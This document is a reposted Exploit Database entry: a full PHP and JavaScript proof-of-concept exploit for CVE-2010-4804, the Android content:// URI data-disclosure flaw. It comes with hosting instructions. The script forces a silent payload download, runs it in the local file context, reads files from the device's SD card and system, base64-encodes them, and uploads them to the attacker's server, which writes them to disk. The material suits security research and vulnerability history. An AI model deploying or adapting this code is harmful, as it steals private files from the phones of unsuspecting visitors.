Google Android – ‘content://’ URI Multiple Information Disclosure Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Thomas Cannon
  日期： 2011-11-28
• 类别：

  • webapps
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/18164/

• <?php 
  /* 
  * Description:Android 'content://' URI Multiple Information Disclosure Vulnerabilities
  * Bugtraq ID: 48256
  * CVE:CVE-2010-4804
  * Affected: Android < 2.3.4
  * Author: Thomas Cannon
  * Discovered: 18-Nov-2010
  * Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/
  *
  * Filename: poc.php
  * Instructions: Specify files you want to upload in filenames array. Host this php file
  * on a server and visit it using the Android Browser. Some builds of Android
  * may require adjustments to the script, for example when a German build was
  * tested it downloaded the payload as .htm instead of .html, even though .html
  * was specified. 
  *
  * Tested on:HTC Desire (UK Version) with Android 2.2
  */
  
  //List of the files on the device that we want to upload to our server
  $filenames = array("/proc/version","/sdcard/img.jpg");
  
  //Determine the full URL of this script
  $protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http";
  $scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];
  
  //Stage 0:Display introduction text and a link to start the PoC.
  function stage0($scripturl) {
  echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>";
  }
  
  //Stage 1:Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect 
  //to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the
  //context of the local device - this is the vulnerability.
  function stage1($scripturl) {
  echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">";
  }
  
  //Stage 2:Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.
  //The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3).
  function stage2($scripturl,$filenames) {
  header("Cache-Control: public");
  header("Content-Description: File Transfer");
  header("Content-Disposition: attachment; filename=poc.html");
  header("Content-Type: text/html");
  header("Content-Transfer-Encoding: binary");
  ?>
  <html>
  <body>
  <script language='javascript'>
  var filenames = Array('<?php echo implode("','",$filenames); ?>');
  var filecontents = new Array();
  function processBinary(xmlhttp) {
  data = xmlhttp.responseText;r = ''; size = data.length;
  for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff);
  return r;
  }
  function getFiles(filenames) {
  for (var filename in filenames) {
  filename = filenames[filename];
  xhr = new XMLHttpRequest();
  xhr.open('GET', filename, false);
  xhr.overrideMimeType('text/plain; charset=x-user-defined');
  xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } }
  xhr.send();
  }
  }
  function addField(form, name, value) {
  var fe = document.createElement('input');
  fe.setAttribute('type', 'hidden');
  fe.setAttribute('name', name);
  fe.setAttribute('value', value);
  form.appendChild(fe);
  }
  function uploadFiles(filecontents) {
  var form = document.createElement('form');
  form.setAttribute('method', 'POST');
  form.setAttribute('enctype', 'multipart/form-data');
  form.setAttribute('action', '<?=$scripturl?>?stage=3');
  var i = 0;
  for (var filename in filecontents) {
  addField(form, 'filename'+i, btoa(filename));
  addField(form, 'data'+i, filecontents[filename]);
  i += 1;
  }
  document.body.appendChild(form);
  form.submit();
  }
  getFiles(filenames);
  uploadFiles(filecontents);
  </script>
  </body>
  </html>
  <?php
  }
  
  //Stage 3:Read the file names and contents sent by the payload and write to a file on the server.
  function stage3() {
  $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!");
  fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!"); 
  fclose($fp); 
  echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";
  }
  
  //Select the stage to run depending on the parameter passed in the URL
  switch($_GET["stage"]) { 
  case "1": 
  stage1($scripturl); 
  break; 
  case "2": 
  stage2($scripturl,$filenames); 
  break; 
  case "3": 
  stage3(); 
  break;
  default: 
  stage0($scripturl); 
  break; 
  } 
  ?>